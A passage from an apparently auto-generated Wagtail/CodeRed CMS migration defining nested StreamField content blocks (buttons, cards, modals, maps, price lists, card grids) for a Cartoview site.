expand horizontally or stack vertically.', required=False, verbose_name='Column Breakpoint'))])), ('column_size', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Automatically size'), ('12', 'Full row'), ('6', 'Half - 1/2 column'), ('4', 'Thirds - 1/3 column'), ('8', 'Thirds - 2/3 column'), ('3', 'Quarters - 1/4 column'), ('9', 'Quarters - 3/4 column'), ('2', 'Sixths - 1/6 column'), ('10', 'Sixths - 5/6 column'), ('1', 'Twelfths - 1/12 column'), ('5', 'Twelfths - 5/12 column'), ('7', 'Twelfths - 7/12 column'), ('11', 'Twelfths - 11/12 column')], label='Column size', required=False)), ('content', wagtail.core.blocks.StreamBlock([('header', wagtail.core.blocks.StructBlock([('header', wagtail.core.blocks.ChoiceBlock(choices=[('h1', 'H1'), ('h2', 'H2'), ('h3', 'H3'), ('h4', 'H4'), ('h5', 'H5'), ('h6', 'H6')], label='Header Size')), ('text', wagtail.core.blocks.CharBlock(label='Text', max_length=50))])), ('text', coderedcms.blocks.html_blocks.RichTextBlock(icon='fa-file-text-o')), ('button', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False)), ('ga_tracking_event_category', wagtail.core.blocks.CharBlock(label='Tracking Event Category', max_length=255, required=False)), ('ga_tracking_event_label', wagtail.core.blocks.CharBlock(label='Tracking Event Label', max_length=255, required=False))])), ('page_link', wagtail.core.blocks.PageChooserBlock(label='Page link', required=False)), ('doc_link', wagtail.documents.blocks.DocumentChooserBlock(label='Document link', required=False)), ('other_link', wagtail.core.blocks.CharBlock(label='Other link', max_length=255, required=False)), ('button_title', wagtail.core.blocks.CharBlock(label='Button Title', max_length=255, required=True)), ('button_style', wagtail.core.blocks.ChoiceBlock(choices=[('btn-primary', 'Primary'), ('btn-secondary', 'Secondary'), ('btn-success', 'Success'), ('btn-danger', 'Danger'), ('btn-warning', 'Warning'), ('btn-info', 'Info'), ('btn-link', 'Link'), ('btn-light', 'Light'), ('btn-dark', 'Dark'), ('btn-outline-primary', 'Outline Primary'), ('btn-outline-secondary', 'Outline Secondary'), ('btn-outline-success', 'Outline Success'), ('btn-outline-danger', 'Outline Danger'), ('btn-outline-warning', 'Outline Warning'), ('btn-outline-info', 'Outline Info'), ('btn-outline-light', 'Outline Light'), ('btn-outline-dark', 'Outline Dark')], label='Button Style', required=False)), ('button_size', wagtail.core.blocks.ChoiceBlock(choices=[('btn-sm', 'Small'), ('', 'Default'), ('btn-lg', 'Large')], label='Button Size', required=False))])), ('image', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('image', wagtail.images.blocks.ImageChooserBlock(label='Image'))])), ('image_text_overlay', wagtail.core.blocks.StructBlock([('image', wagtail.images.blocks.ImageChooserBlock(label='Image')), ('text', wagtail.core.blocks.CharBlock(label='Text', max_length=200))])), ('image_link', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False)), ('ga_tracking_event_category', wagtail.core.blocks.CharBlock(label='Tracking Event Category', max_length=255, required=False)), ('ga_tracking_event_label', wagtail.core.blocks.CharBlock(label='Tracking Event Label', max_length=255, required=False))])), ('page_link', wagtail.core.blocks.PageChooserBlock(label='Page link', required=False)), ('doc_link', wagtail.documents.blocks.DocumentChooserBlock(label='Document link', required=False)), ('other_link', wagtail.core.blocks.CharBlock(label='Other link', max_length=255, required=False)), ('image', wagtail.images.blocks.ImageChooserBlock(label='Image')), ('alt_text', wagtail.core.blocks.CharBlock(help_text='Alternate text to show if the image doesn’t load', max_length=255, required=True))])), ('list', wagtail.core.blocks.StructBlock([('content', wagtail.core.blocks.ListBlock(wagtail.core.blocks.CharBlock(), label='Items'))])), ('html', wagtail.core.blocks.RawHTMLBlock(form_classname='monospace', icon='code', label='HTML')), ('accordions', wagtail.core.blocks.StructBlock([('title', wagtail.core.blocks.CharBlock(label='Title', max_length=50)), ('content', wagtail.core.blocks.RichTextBlock(label='Content'))])), ('download', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False)), ('ga_tracking_event_category', wagtail.core.blocks.CharBlock(label='Tracking Event Category', max_length=255, required=False)), ('ga_tracking_event_label', wagtail.core.blocks.CharBlock(label='Tracking Event Label', max_length=255, required=False))])), ('button_title', wagtail.core.blocks.CharBlock(label='Button Title', max_length=255, required=True)), ('button_style', wagtail.core.blocks.ChoiceBlock(choices=[('btn-primary', 'Primary'), ('btn-secondary', 'Secondary'), ('btn-success', 'Success'), ('btn-danger', 'Danger'), ('btn-warning', 'Warning'), ('btn-info', 'Info'), ('btn-link', 'Link'), ('btn-light', 'Light'), ('btn-dark', 'Dark'), ('btn-outline-primary', 'Outline Primary'), ('btn-outline-secondary', 'Outline Secondary'), ('btn-outline-success', 'Outline Success'), ('btn-outline-danger', 'Outline Danger'), ('btn-outline-warning', 'Outline Warning'), ('btn-outline-info', 'Outline Info'), ('btn-outline-light', 'Outline Light'), ('btn-outline-dark', 'Outline Dark')], label='Button Style', required=False)), ('button_size', wagtail.core.blocks.ChoiceBlock(choices=[('btn-sm', 'Small'), ('', 'Default'), ('btn-lg', 'Large')], label='Button Size', required=False)), ('automatic_download', wagtail.core.blocks.BooleanBlock(label='Auto download', required=False)), ('downloadable_file', wagtail.documents.blocks.DocumentChooserBlock(label='Document link', required=False))])), ('embed_video', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('url', wagtail.embeds.blocks.EmbedBlock(help_text='Link to a YouTube/Vimeo video, tweet, facebook post, etc.', label='URL', required=True))])), ('quote', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('text', wagtail.core.blocks.TextBlock(label='Quote Text', required=True, rows=4)), ('author', wagtail.core.blocks.CharBlock(label='Author', max_length=255, required=False))])), ('table', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('table', wagtail.contrib.table_block.blocks.TableBlock())])), ('google_map', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('search', wagtail.core.blocks.CharBlock(help_text='Address or search term used to find your location on the map.', label='Search query', max_length=255, required=False)), ('map_title', wagtail.core.blocks.CharBlock(help_text='Map title for screen readers, ex: "Map to Goodale Park"', label='Map title', max_length=255, required=False)), ('place_id', wagtail.core.blocks.CharBlock(help_text='Requires API key to use place ID.', label='Google place ID', max_length=255, required=False)), ('map_zoom_level', wagtail.core.blocks.IntegerBlock(default=14, help_text='Requires API key to use zoom. 1: World, 5: Landmass/continent, 10: City, 15: Streets, 20: Buildings', label='Map zoom level', required=False))])), ('page_list', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default'), ('coderedcms/blocks/pagelist_block.html', 'General, simple list'), ('coderedcms/blocks/pagelist_list_group.html', 'General, list group navigation panel'), ('coderedcms/blocks/pagelist_article_media.html', 'Article, media format'), ('coderedcms/blocks/pagelist_article_card_group.html', 'Article, card group - attached cards of equal size'), ('coderedcms/blocks/pagelist_article_card_deck.html', 'Article, card deck - separate cards of equal size'), ('coderedcms/blocks/pagelist_article_card_columns.html', 'Article, card masonry - fluid brick pattern')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('indexed_by', wagtail.core.blocks.PageChooserBlock(help_text='Show a preview of pages that are children of the selected page. Uses ordering specified in the page’s LAYOUT tab.', label='Parent page', required=True)), ('classified_by', coderedcms.blocks.base_blocks.ClassifierTermChooserBlock(help_text='Only show pages that are classified with this term.', label='Classified as', required=False)), ('show_preview', wagtail.core.blocks.BooleanBlock(default=False, label='Show body preview', required=False)), ('num_posts', wagtail.core.blocks.IntegerBlock(default=3, label='Number of pages to show'))])), ('page_preview', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default'), ('coderedcms/blocks/pagepreview_card.html', 'Card'), ('coderedcms/blocks/pagepreview_form.html', 'Form inputs')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('page', wagtail.core.blocks.PageChooserBlock(help_text='Show a mini preview of the selected page.', label='Page to preview', required=True))])), ('card', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default'), ('coderedcms/blocks/card_block.html', 'Card'), ('coderedcms/blocks/card_head.html', 'Card with header'), ('coderedcms/blocks/card_foot.html', 'Card with footer'), ('coderedcms/blocks/card_head_foot.html', 'Card with header and footer'), ('coderedcms/blocks/card_blurb.html', 'Blurb - rounded image and no border'), ('coderedcms/blocks/card_img.html', 'Cover image - use image as background')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('image', wagtail.images.blocks.ImageChooserBlock(label='Image', max_length=255, required=False)), ('title', wagtail.core.blocks.CharBlock(label='Title', max_length=255, required=False)), ('subtitle', wagtail.core.blocks.CharBlock(label='Subtitle', max_length=255, required=False)), ('description', wagtail.core.blocks.RichTextBlock(features=['bold', 'italic', 'ol', 'ul', 'hr', 'link', 'document-link'], label='Body')), ('links', wagtail.core.blocks.StreamBlock([('Links', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False)), ('ga_tracking_event_category', wagtail.core.blocks.CharBlock(label='Tracking Event Category', max_length=255, required=False)), ('ga_tracking_event_label', wagtail.core.blocks.CharBlock(label='Tracking Event Label', max_length=255, required=False))])), ('page_link', wagtail.core.blocks.PageChooserBlock(label='Page link', required=False)), ('doc_link', wagtail.documents.blocks.DocumentChooserBlock(label='Document link', required=False)), ('other_link', wagtail.core.blocks.CharBlock(label='Other link', max_length=255, required=False)), ('button_title', wagtail.core.blocks.CharBlock(label='Button Title', max_length=255, required=True)), ('button_style', wagtail.core.blocks.ChoiceBlock(choices=[('btn-primary', 'Primary'), ('btn-secondary', 'Secondary'), ('btn-success', 'Success'), ('btn-danger', 'Danger'), ('btn-warning', 'Warning'), ('btn-info', 'Info'), ('btn-link', 'Link'), ('btn-light', 'Light'), ('btn-dark', 'Dark'), ('btn-outline-primary', 'Outline Primary'), ('btn-outline-secondary', 'Outline Secondary'), ('btn-outline-success', 'Outline Success'), ('btn-outline-danger', 'Outline Danger'), ('btn-outline-warning', 'Outline Warning'), ('btn-outline-info', 'Outline Info'), ('btn-outline-light', 'Outline Light'), ('btn-outline-dark', 'Outline Dark')], label='Button Style', required=False)), ('button_size', wagtail.core.blocks.ChoiceBlock(choices=[('btn-sm', 'Small'), ('', 'Default'), ('btn-lg', 'Large')], label='Button Size', required=False))]))], blank=True, label='Links', required=False))])), ('carousel', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('carousel', wagtail.snippets.blocks.SnippetChooserBlock('coderedcms.Carousel'))])), ('modal', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('button_title', wagtail.core.blocks.CharBlock(label='Button Title', max_length=255, required=True)), ('button_style', wagtail.core.blocks.ChoiceBlock(choices=[('btn-primary', 'Primary'), ('btn-secondary', 'Secondary'), ('btn-success', 'Success'), ('btn-danger', 'Danger'), ('btn-warning', 'Warning'), ('btn-info', 'Info'), ('btn-link', 'Link'), ('btn-light', 'Light'), ('btn-dark', 'Dark'), ('btn-outline-primary', 'Outline Primary'), ('btn-outline-secondary', 'Outline Secondary'), ('btn-outline-success', 'Outline Success'), ('btn-outline-danger', 'Outline Danger'), ('btn-outline-warning', 'Outline Warning'), ('btn-outline-info', 'Outline Info'), ('btn-outline-light', 'Outline Light'), ('btn-outline-dark', 'Outline Dark')], label='Button Style', required=False)), ('button_size', wagtail.core.blocks.ChoiceBlock(choices=[('btn-sm', 'Small'), ('', 'Default'), ('btn-lg', 'Large')], label='Button Size', required=False)), ('header', wagtail.core.blocks.CharBlock(label='Modal heading', max_length=255, required=False)), ('content', wagtail.core.blocks.StreamBlock([('header', wagtail.core.blocks.StructBlock([('header', wagtail.core.blocks.ChoiceBlock(choices=[('h1', 'H1'), ('h2', 'H2'), ('h3', 'H3'), ('h4', 'H4'), ('h5', 'H5'), ('h6', 'H6')], label='Header Size')), ('text', wagtail.core.blocks.CharBlock(label='Text', max_length=50))])), ('text', coderedcms.blocks.html_blocks.RichTextBlock(icon='fa-file-text-o')), ('button', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False)), ('ga_tracking_event_category', wagtail.core.blocks.CharBlock(label='Tracking Event Category', max_length=255, required=False)), ('ga_tracking_event_label', wagtail.core.blocks.CharBlock(label='Tracking Event Label', max_length=255, required=False))])), ('page_link', wagtail.core.blocks.PageChooserBlock(label='Page link', required=False)), ('doc_link', wagtail.documents.blocks.DocumentChooserBlock(label='Document link', required=False)), ('other_link', wagtail.core.blocks.CharBlock(label='Other link', max_length=255, required=False)), ('button_title', wagtail.core.blocks.CharBlock(label='Button Title', max_length=255, required=True)), ('button_style', wagtail.core.blocks.ChoiceBlock(choices=[('btn-primary', 'Primary'), ('btn-secondary', 'Secondary'), ('btn-success', 'Success'), ('btn-danger', 'Danger'), ('btn-warning', 'Warning'), ('btn-info', 'Info'), ('btn-link', 'Link'), ('btn-light', 'Light'), ('btn-dark', 'Dark'), ('btn-outline-primary', 'Outline Primary'), ('btn-outline-secondary', 'Outline Secondary'), ('btn-outline-success', 'Outline Success'), ('btn-outline-danger', 'Outline Danger'), ('btn-outline-warning', 'Outline Warning'), ('btn-outline-info', 'Outline Info'), ('btn-outline-light', 'Outline Light'), ('btn-outline-dark', 'Outline Dark')], label='Button Style', required=False)), ('button_size', wagtail.core.blocks.ChoiceBlock(choices=[('btn-sm', 'Small'), ('', 'Default'), ('btn-lg', 'Large')], label='Button Size', required=False))])), ('image', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('image', wagtail.images.blocks.ImageChooserBlock(label='Image'))])), ('image_text_overlay', wagtail.core.blocks.StructBlock([('image', wagtail.images.blocks.ImageChooserBlock(label='Image')), ('text', wagtail.core.blocks.CharBlock(label='Text', max_length=200))])), ('image_link', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False)), ('ga_tracking_event_category', wagtail.core.blocks.CharBlock(label='Tracking Event Category', max_length=255, required=False)), ('ga_tracking_event_label', wagtail.core.blocks.CharBlock(label='Tracking Event Label', max_length=255, required=False))])), ('page_link', wagtail.core.blocks.PageChooserBlock(label='Page link', required=False)), ('doc_link', wagtail.documents.blocks.DocumentChooserBlock(label='Document link', required=False)), ('other_link', wagtail.core.blocks.CharBlock(label='Other link', max_length=255, required=False)), ('image', wagtail.images.blocks.ImageChooserBlock(label='Image')), ('alt_text', wagtail.core.blocks.CharBlock(help_text='Alternate text to show if the image doesn’t load', max_length=255, required=True))])), ('list', wagtail.core.blocks.StructBlock([('content', wagtail.core.blocks.ListBlock(wagtail.core.blocks.CharBlock(), label='Items'))])), ('html', wagtail.core.blocks.RawHTMLBlock(form_classname='monospace', icon='code', label='HTML')), ('accordions', wagtail.core.blocks.StructBlock([('title', wagtail.core.blocks.CharBlock(label='Title', max_length=50)), ('content', wagtail.core.blocks.RichTextBlock(label='Content'))])), ('download', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False)), ('ga_tracking_event_category', wagtail.core.blocks.CharBlock(label='Tracking Event Category', max_length=255, required=False)), ('ga_tracking_event_label', wagtail.core.blocks.CharBlock(label='Tracking Event Label', max_length=255, required=False))])), ('button_title', wagtail.core.blocks.CharBlock(label='Button Title', max_length=255, required=True)), ('button_style', wagtail.core.blocks.ChoiceBlock(choices=[('btn-primary', 'Primary'), ('btn-secondary', 'Secondary'), ('btn-success', 'Success'), ('btn-danger', 'Danger'), ('btn-warning', 'Warning'), ('btn-info', 'Info'), ('btn-link', 'Link'), ('btn-light', 'Light'), ('btn-dark', 'Dark'), ('btn-outline-primary', 'Outline Primary'), ('btn-outline-secondary', 'Outline Secondary'), ('btn-outline-success', 'Outline Success'), ('btn-outline-danger', 'Outline Danger'), ('btn-outline-warning', 'Outline Warning'), ('btn-outline-info', 'Outline Info'), ('btn-outline-light', 'Outline Light'), ('btn-outline-dark', 'Outline Dark')], label='Button Style', required=False)), ('button_size', wagtail.core.blocks.ChoiceBlock(choices=[('btn-sm', 'Small'), ('', 'Default'), ('btn-lg', 'Large')], label='Button Size', required=False)), ('automatic_download', wagtail.core.blocks.BooleanBlock(label='Auto download', required=False)), ('downloadable_file', wagtail.documents.blocks.DocumentChooserBlock(label='Document link', required=False))])), ('embed_video', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('url', wagtail.embeds.blocks.EmbedBlock(help_text='Link to a YouTube/Vimeo video, tweet, facebook post, etc.', label='URL', required=True))])), ('quote', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('text', wagtail.core.blocks.TextBlock(label='Quote Text', required=True, rows=4)), ('author', wagtail.core.blocks.CharBlock(label='Author', max_length=255, required=False))])), ('table', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('table', wagtail.contrib.table_block.blocks.TableBlock())])), ('google_map', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('search', wagtail.core.blocks.CharBlock(help_text='Address or search term used to find your location on the map.', label='Search query', max_length=255, required=False)), ('map_title', wagtail.core.blocks.CharBlock(help_text='Map title for screen readers, ex: "Map to Goodale Park"', label='Map title', max_length=255, required=False)), ('place_id', wagtail.core.blocks.CharBlock(help_text='Requires API key to use place ID.', label='Google place ID', max_length=255, required=False)), ('map_zoom_level', wagtail.core.blocks.IntegerBlock(default=14, help_text='Requires API key to use zoom. 1: World, 5: Landmass/continent, 10: City, 15: Streets, 20: Buildings', label='Map zoom level', required=False))])), ('page_list', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default'), ('coderedcms/blocks/pagelist_block.html', 'General, simple list'), ('coderedcms/blocks/pagelist_list_group.html', 'General, list group navigation panel'), ('coderedcms/blocks/pagelist_article_media.html', 'Article, media format'), ('coderedcms/blocks/pagelist_article_card_group.html', 'Article, card group - attached cards of equal size'), ('coderedcms/blocks/pagelist_article_card_deck.html', 'Article, card deck - separate cards of equal size'), ('coderedcms/blocks/pagelist_article_card_columns.html', 'Article, card masonry - fluid brick pattern')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('indexed_by', wagtail.core.blocks.PageChooserBlock(help_text='Show a preview of pages that are children of the selected page. Uses ordering specified in the page’s LAYOUT tab.', label='Parent page', required=True)), ('classified_by', coderedcms.blocks.base_blocks.ClassifierTermChooserBlock(help_text='Only show pages that are classified with this term.', label='Classified as', required=False)), ('show_preview', wagtail.core.blocks.BooleanBlock(default=False, label='Show body preview', required=False)), ('num_posts', wagtail.core.blocks.IntegerBlock(default=3, label='Number of pages to show'))])), ('page_preview', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default'), ('coderedcms/blocks/pagepreview_card.html', 'Card'), ('coderedcms/blocks/pagepreview_form.html', 'Form inputs')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('page', wagtail.core.blocks.PageChooserBlock(help_text='Show a mini preview of the selected page.', label='Page to preview', required=True))]))], label='Content')), ('footer', wagtail.core.blocks.StreamBlock([('text', wagtail.core.blocks.CharBlock(icon='fa-file-text-o', label='Simple Text', max_length=255)), ('button', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False)), ('ga_tracking_event_category', wagtail.core.blocks.CharBlock(label='Tracking Event Category', max_length=255, required=False)), ('ga_tracking_event_label', wagtail.core.blocks.CharBlock(label='Tracking Event Label', max_length=255, required=False))])), ('page_link', wagtail.core.blocks.PageChooserBlock(label='Page link', required=False)), ('doc_link', wagtail.documents.blocks.DocumentChooserBlock(label='Document link', required=False)), ('other_link', wagtail.core.blocks.CharBlock(label='Other link', max_length=255, required=False)), ('button_title', wagtail.core.blocks.CharBlock(label='Button Title', max_length=255, required=True)), ('button_style', wagtail.core.blocks.ChoiceBlock(choices=[('btn-primary', 'Primary'), ('btn-secondary', 'Secondary'), ('btn-success', 'Success'), ('btn-danger', 'Danger'), ('btn-warning', 'Warning'), ('btn-info', 'Info'), ('btn-link', 'Link'), ('btn-light', 'Light'), ('btn-dark', 'Dark'), ('btn-outline-primary', 'Outline Primary'), ('btn-outline-secondary', 'Outline Secondary'), ('btn-outline-success', 'Outline Success'), ('btn-outline-danger', 'Outline Danger'), ('btn-outline-warning', 'Outline Warning'), ('btn-outline-info', 'Outline Info'), ('btn-outline-light', 'Outline Light'), ('btn-outline-dark', 'Outline Dark')], label='Button Style', required=False)), ('button_size', wagtail.core.blocks.ChoiceBlock(choices=[('btn-sm', 'Small'), ('', 'Default'), ('btn-lg', 'Large')], label='Button Size', required=False))]))], label='Modal footer', required=False))])), ('map', wagtail.core.blocks.StructBlock([('map', cartoview_cms.models.streamfields.Blocks.MapChooserBlock(required=True))])), ('map_catalog', wagtail.core.blocks.StructBlock([('title', wagtail.core.blocks.CharBlock(label='Title', max_length=240)), ('featured_maps', wagtail.core.blocks.ListBlock(cartoview_cms.models.streamfields.Blocks.FeaturedMapChooser(), label='Featured Maps'))])), ('pricelist', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('heading', wagtail.core.blocks.CharBlock(label='Heading', max_length=255, required=False)), ('items', wagtail.core.blocks.StreamBlock([('item', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('image', wagtail.images.blocks.ImageChooserBlock(label='Image', required=False)), ('name', wagtail.core.blocks.CharBlock(label='Name', max_length=255, required=True)), ('description', wagtail.core.blocks.TextBlock(label='Description', required=False, rows=4)), ('price', wagtail.core.blocks.CharBlock(help_text='Any text here. Include currency sign if desired.', label='Price', required=True))]))], label='Items'))])), ('reusable_content', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('content', wagtail.snippets.blocks.SnippetChooserBlock('coderedcms.ReusableContent'))]))], label='Content'))]))], label='Content'))])), ('cardgrid', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default'), ('coderedcms/blocks/cardgrid_group.html', 'Card group - attached cards of equal size'), ('coderedcms/blocks/cardgrid_deck.html', 'Card deck - separate cards of equal size'), ('coderedcms/blocks/cardgrid_columns.html', 'Card masonry - fluid brick pattern')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', 